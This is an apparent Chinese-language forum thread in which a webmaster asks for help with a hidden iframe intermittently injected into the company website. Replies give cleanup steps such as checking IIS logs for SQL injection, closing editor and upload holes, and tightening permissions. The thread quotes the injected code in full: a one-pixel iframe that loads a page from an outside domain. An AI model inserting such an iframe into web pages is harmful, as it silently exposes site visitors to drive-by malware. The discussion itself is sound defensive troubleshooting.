我们公司的网站
http://www.girlmen.com/注入的代码是 <iframe src=http://www.whsp.com.cn/obj/index.htm width=1 height=0></iframe>
而且是时有时无 第一次开没有,刷新下有
它在FF中界面不受影响 其它的都有影响已经处理过的有 1.服务器杀毒 2.数据库字段查询 3 项目文件 都没有找到
已经的情况:服务器调试没有注入的代码 同一项目发布没有注入的代码
求解 或是给出解决思路
http://www.girlmen.com/注入的代码是 <iframe src=http://www.whsp.com.cn/obj/index.htm width=1 height=0></iframe>
而且是时有时无 第一次开没有,刷新下有
它在FF中界面不受影响 其它的都有影响已经处理过的有 1.服务器杀毒 2.数据库字段查询 3 项目文件 都没有找到
已经的情况:服务器调试没有注入的代码 同一项目发布没有注入的代码
求解 或是给出解决思路
数据库下个存储过程,搜索有没有,有就删除
异常排除后,把站点设置为iis的user只读,只有上传图片的地方可写
下载几个注入工具,扫描网站有没有漏洞,并堵上
注入的代码时有时无 是不是ART挂马
http://www.girlmen.com/EQSchoolSys/EQSchool.aspx 这个时有时无
1.1检查iis日志,查看是否有异常的sql注入的url请求,如果有发现就可以知道哪里被注入了,将漏洞补上
1.2 检查是否存在富文本编辑器漏洞如fckeditor,
1.3检查是否存在文件上传漏洞二、清除被挂马网页:可以通过查看网页文档的修改时间来排查文档是否被修改过,并清除被挂的马,有些马可能是动态挂上的,即通过修改页面脚本来动态生成<ifram或<script等木马,也可能存在一句话木马;
也可通过一些工具要扫描是否被挂马三、重新设置iis权限,像保存上传文件的文件夹不要给矛执行脚本的权限,网站根目录不要给矛写权限。重设数据库权限,数据库连接用户名不要使用sa,重新分配数据库登录用户名,并给它设置最低权限
要治本就得找出中毒的电脑
直接访问:http://61.183.15.52
也提示有木马!
问题搞定了 是局网中毒了和服务器有木马 加上google刷新 有点慢慢 所以问题处理了 还提示问题